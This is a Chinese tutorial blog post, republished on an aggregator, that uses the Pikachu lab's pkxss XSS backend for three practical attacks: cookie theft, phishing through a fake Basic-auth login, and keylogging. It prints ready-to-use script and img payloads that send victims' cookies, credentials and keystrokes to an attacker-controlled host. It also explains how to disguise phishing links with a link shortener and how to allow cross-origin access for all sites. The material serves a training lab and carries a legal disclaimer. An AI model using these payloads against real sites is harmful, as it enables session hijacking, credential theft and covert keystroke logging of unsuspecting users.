使用pikachu管理工具下的XSS后台进行实战

这篇具有很好参考价值的文章主要介绍了使用pikachu管理工具下的XSS后台进行实战。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

写在前面的重要提示:

Attention技术没有好坏之分,关键在于使用技术的人或组织。网络安全技术是一把双刃剑 – 作为网络安全人,虽然无法控制头上的帽子是否会变绿,但能控制不让它变黑;无论我们在物质上面对多大的诱惑或是面对多么艰难的窘境,精神上一定不要放弃最初成为顶级白帽的理想。一路走来,我们不一定能用自己所掌握的技术促进网络安全事业的进步与发展,但一定不要且不能站在网络安全事业发展的对立面。

Warning:本文仅限于技术交流,禁止一切利用本文涉及的技术进行违法犯罪活动。如有违者,后果自负。且笔者建议各位网络安全从业者,熟读且背诵我国网络安全相关法律法规,这也是对自己职业生涯负责的行为。

一:pikachu管理工具下的XSS后台简介

     pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战型实验来帮助学习者理解XSS漏洞的原理和危害的一个平台。旨在帮助学习者在实战中深入理解理论,从而可以更好的防御XSS漏洞。

Xss后台登录页面:

                   使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

Xss后台主页面:

                使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

二:XSS后台的启动

方式一:直接进入pikachu靶场的管理工具模块 —> 进入XSS后台。(第一次使用需要先创建数据库)

方式二:XSS后台在pikachu靶场文件中是一个独立的文件:pkxss。若不想部署整个pikachu靶场,可以把pkxss文件单独部署在攻击主机中,单独搭建XSS后台。(如:笔者部署在虚拟机的PHPstudy中 – 部署方式和部署靶场一致,不了解的读者可以看笔者关于靶场部署的文章)

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

三:实战型实验演示

  • Cookie窃取

GET型:

原理图:

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

第一步:修改配置文件

1)进入pkxss目录找到xcookie,打开cookie.php文件修改配置。(E:\phpstudy_pro\WWW\Test\pkxss\xcookie\cookie.php)。

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

修改框中的URL:这个URL地址表示重定向到一个可信任的IP地址,换句话说就是被攻击者促发攻击代码受到攻击时页面跳转(刷新)至这个URL地址,这样做的目的是在攻击时造成的网页跳转可以减少甚至消除被攻击者的怀疑。(笔者将pikachu部署在本地的PHPstudy中:E:\phpstudy_pro\WWW\Test\pikachu-master,这个RUL的意思是:在受到攻击时,页面跳转到pikachu靶场的主页)。

第二步:构造攻击代码

1)构造一段获取cookie的攻击代码,并将代码通过XSS漏洞注入到被攻击主机可能浏览并存在XSS漏洞的站点,等待攻击成功。

这里为了帮助读者们理解,使用pikachu靶场的XSS存储型漏洞进行演示。

  1. 查看XSS平台下Cookie获取模块是否由历史数据。

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

(2)构造攻击代码:<script>document.location = ‘http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=’ + document.cookie;</script>

(注意:攻击代码中http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php页面,代表当用户触发到攻击代码时,攻击代码运行收集到用户的Cookie,并将Cookie发送给这个URL页面。当然,这个URL是受攻击者控制的)

第三步:将代码通过输入框或网页URL注入到页面中

注意:由于注入框设置了字符输入限制,需要先打开代码调式工具(右击—>检查),将字符输入限制更改

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

第四步:查看记录

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

POST型:

              使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

原理:

     POST型和GET型基本原理大差不差,主要的不同在于参数的提交方式是表单提交,不能通过URL进行参数提交,因此攻击者无法通过URL的方式将恶意代码嵌入。所以,攻击者需要构造一个Form表单,当用户点击攻击者的表单连接,用户就替攻击者发送一个提交请求,之后的攻击步骤就和GET型一致了。

第一步:构造Form表单

1)修改配置

     修改pkxss目录下的文件: pkxss/xcookie/post.html

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

  1. 将用户服务器IP地址和文件路径填入白框:如:http://pikachu/pkxss/xcookie/pkxss_cookie_result.php
  2. 将攻击者所控制的机器IP和文件路径填入黄框:http://pikachu/pkxss/xcookie/cookie.php

第二步:登录页面,在攻击框内输入攻击代码(步骤和GET型一致):<script>document.location = ‘http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=’ + document.cookie;</script>

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络      使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

第三步:查看攻击结果:

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

  • 钓鱼攻击

钓鱼攻击的思路:攻击者向用户端发送一个经过处理的链接请求,用户点击链接后会给攻击者提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部给用户端,若用户安全意识不够,输入了敏感信息:用户名和密码。这些信息就会被发送到攻击者控制的XSS后台。

第一步:配置文件

     配置pkxss/xfish目录的fish.php文件:将图片红框中的信息配置为攻击者所控制的获取被攻击者信息的文件的后台地址:如:http://pikachu/pkxss/xfish/xfish.php(笔者本地pikachu XSS后台管理平台地址)

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

第二步:构造钓鱼攻击链接

注意:钓鱼的后台有个接口(xfish.php)获取远程的数据,通过get方式去获取账号密码存到库里。文件地址:pikachu/pkxss/xfish/xfish.php

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

构造一个可以访问攻击者所控制的后台并且能返回Basic认证的链接,也可以是a标签、img标签、script标签等。

注意:为了让构造的钓鱼链接不让被攻击者发现,可以使用相应的链接处理工具对链接进行处理。

链接处理平台:http://tools.jb51.net/password/dwzcreate

如:

链接1: http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php

平台处理之后:http://mrw.so/6oy3Hb

链接2:<img src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></img>

链接3:<script src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></script>

第三步:使用pikachu靶场测试

1)将构造的钓鱼链接嵌入pikachu靶场,点击提交,弹出输入框。

                                 使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

 2)输入用户名:北冥同学;密码:123456。点击登录。

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

第四步:查看后台结果

  • 获取键盘记录

获取键盘记录攻击原理:利用XSS漏洞将攻击代码注入到页面,当被攻击者访问该页面,其在该页面的任何操作将被记录,同时攻击代码将把记录发送至攻击者所控制的后台。

第一步:修改配置

1)将pikachu靶场文件目录下的pkxss/ rkeypress/rk.js。如图中红框中内容替换为攻击者所控制的获取被攻击者键盘记录的文件的后台地址。如:http://pikachu/pkxss/rkeypress/rkserver.php

使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

2)修改rkserver.php文件(路径:pkxss/rkeypress/rkserver.php)。

       使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

将是否允许跨域访问设置为:所有。【关于浏览器跨域访问的知识分析,可查看笔者博文: 】

第二步:构造攻击代码

<script src= "http://xxx.xxx.xxx/Pikachu-master/pkxss/rkeypress/rk.js"></script>

第三步:利用pikachu靶场验证

    1.将攻击代码注入存在XSS漏洞的页面,等待被攻击者访问该页面。

                        使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

    2.被攻击用户访问该页面,并添加评论:北冥同学,触发攻击。

                                    使用pikachu管理工具下的XSS后台进行实战,# 模拟实验或漏洞复现模块,网络

    3.进入XSS后台查看被攻击键盘记录。文章来源地址https://www.toymoban.com/news/detail-619137.html

到了这里,关于使用pikachu管理工具下的XSS后台进行实战的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 5.git版本管理工具使用

    git是分布式版本管理工具 版本控制? 版本控制是一种记录文件或修改文件历史记录,让用户查看历史版本   集中版本控制 都有单一的集中管理服务器,保存所有文件的修订版本,开发者通过客户端连接这台服务器,取出最新文件或提交更新 缺点:中央服务器单点故障, 如

    2024年02月03日
    浏览(48)
  • git 工具使用--分支管理

    分支管理是Git的杀手级功能之一。分支:就是科幻中的平行宇宙,当你正在电脑面前学习C++的时候,另一个你正在另外一个平行宇宙里面学习Java。如果两个平行宇宙互不干扰,那对现在的你也没啥影响。不过,在某个时间点,两个平时宇宙合并了,结果,你既学习了C++,也学

    2024年02月16日
    浏览(37)
  • git代码管理工具使用全流程

    使用git进行代码的分布式版本管理,首先需要在本地安装、创建本地仓库以及配置git ① 安装git Windows下载安装即可 https://git-scm.com/downloads ② 创建本地仓库 ③ git配置 git本地仓库创建完成之后就可以开始从远程仓库开始拉取代码了 ① clone远程仓库代码 ② 同步远程分支代码到

    2024年02月14日
    浏览(45)
  • 如何使用可视化管理工具DockerUI远程管理docker容器

    DockerUI是一个docker容器镜像的可视化图形化管理工具。DockerUI可以用来轻松构建、管理和维护docker环境。它是完全开源且免费的。基于容器安装方式,部署方便高效,浏览和维护docker单节点或集群节点worker和manager。DockerUI具有易于使用的界面。它不需要记住 docker 指令。只需下

    2024年02月03日
    浏览(38)
  • 启动项管理工具Autoruns使用实验(20)

    实验目的 (1)了解注册表的相关知识; (2)了解程序在开机过程中的自启动; (3)掌握Autoruns在注册表和启动项方面的功能; 预备知识 注册表是windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程

    2024年02月16日
    浏览(26)
  • nginx界面管理工具之nginxWebUI 搭建与使用

    官网地址: http://www.nginxwebui.cn 源码地址:https://git.chihiro.org.cn/chihiro/nginxWebUI 本项目可以使用WebUI配置nginx的各项功能, 包括http协议转发, tcp协议转发, 反向代理, 负载均衡, ssl证书自动申请、续签、配置等, 最终生成nginx.conf文件并覆盖nginx的默认配置文件, 完成nginx的最终功能配置

    2024年04月10日
    浏览(28)
  • Web安全-Behinder(冰蝎)Webshell管理工具使用

    点击页面右侧\\\"releases\\\",进入工具的版本下载页面。 在个人终端安装JDK1.8环境的情况下,下载zip压缩包后打开Behinder.jar即可 类别 运行环境要求 客户端 jre8+ 服务端 .net 2.0+;php 5.3-7.4;java 6+ 冰蝎(behinder)是一款动态二进制加密网站管理客户端。也叫做webshell管理工具,第一代w

    2024年02月13日
    浏览(31)
  • 使用敏捷开发工具做敏捷需求管理流程

    上一篇我们介绍了如何管理产品路线图(用Leangoo领歌Scrum敏捷开发工具管理产品路线图?_哆啦B梦_的博客-CSDN博客),这一篇我们介绍下如何管理产品Backlog。 史诗故事通常都是比较大的故事,所以我们需要将史诗故事规划到产品Backlog中,以便让团队在产品Backlog中对史诗故事

    2024年02月04日
    浏览(33)
  • 包管理工具--》npm的配置及使用(一)

    包管理工具系列文章目录 一、包管理工具--》npm的配置及使用(一) 二、包管理工具--》npm的配置及使用(二)  三、包管理工具--》发布一个自己的npm包 四、包管理工具--》yarn的配置及使用 五、包管理工具--》其他包管理器之cnpm、pnpm、nvm 目录 🌟概念 🌟背景 🌟前端包管

    2024年02月09日
    浏览(34)
  • 包管理工具--》npm的配置及使用(二)

     在阅读本篇文章前请先阅读包管理工具--》npm的配置及使用(一) 包管理工具系列文章目录 一、包管理工具--》npm的配置及使用(一) 二、包管理工具--》npm的配置及使用(二)  三、包管理工具--》发布一个自己的npm包 四、包管理工具--》yarn的配置及使用 五、包管理工具

    2024年02月09日
    浏览(76)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包